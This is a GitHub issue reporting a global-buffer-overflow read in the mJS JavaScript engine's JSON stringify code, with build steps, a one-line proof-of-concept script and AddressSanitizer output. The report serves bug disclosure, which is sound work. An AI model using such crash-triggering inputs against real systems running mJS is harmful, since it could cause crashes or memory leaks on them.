New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

Comments

mJS revision

Commit: b1b6eac

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)

save the makefile then make

make

Test casepoc.js

(JSON.stringify([1, 2, 3]))((JSON.parse - 10900)(JSON.stringify([1, 2, 3])));

​Execution steps & Output

$ ./mjs/build/mjs poc.js

====ERROR: AddressSanitizer: global-buffer-overflow on address 0x5570a88f30e4 at pc 0x5570a8803a88 bp 0x7ffc63d95f40 sp 0x7ffc63d95f30 READ of size 1 at 0x5570a88f30e4 thread T0 #0 0x5570a8803a87 in snquote src/mjs_json.c:81 #1 0x5570a8803a87 in to_json_or_debug src/mjs_json.c:167 #2 0x5570a8803a87 in mjs_json_stringify src/mjs_json.c:267 #3 0x5570a8803a87 in mjs_op_json_stringify src/mjs_json.c:494

0x5570a88f30e4 is located 0 bytes to the right of global variable ‘*.LC1’ defined in ‘src/mjs_array.c’ (0x5570a88f30e0) of size 4 ‘*.LC1’ is ascii string ‘%lu’ 0x5570a88f30e4 is located 60 bytes to the left of global variable ‘*.LC9’ defined in ‘src/mjs_array.c’ (0x5570a88f3120) of size 5 ‘*.LC9’ is ascii string ‘this’ SUMMARY: AddressSanitizer: global-buffer-overflow src/mjs_json.c:81 in snquote Shadow bytes around the buggy address: 0x0aae951165c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae951165d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae951165e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae951165f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae95116600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0aae95116610: 00 00 00 00 00 00 00 00 00 00 00 00[04]f9 f9 f9 0x0aae95116620: f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9 01 f9 f9 f9 0x0aae95116630: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 00 04 f9 f9 0x0aae95116640: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae95116650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0aae95116660: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 00 04 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ====ABORTING

1 participant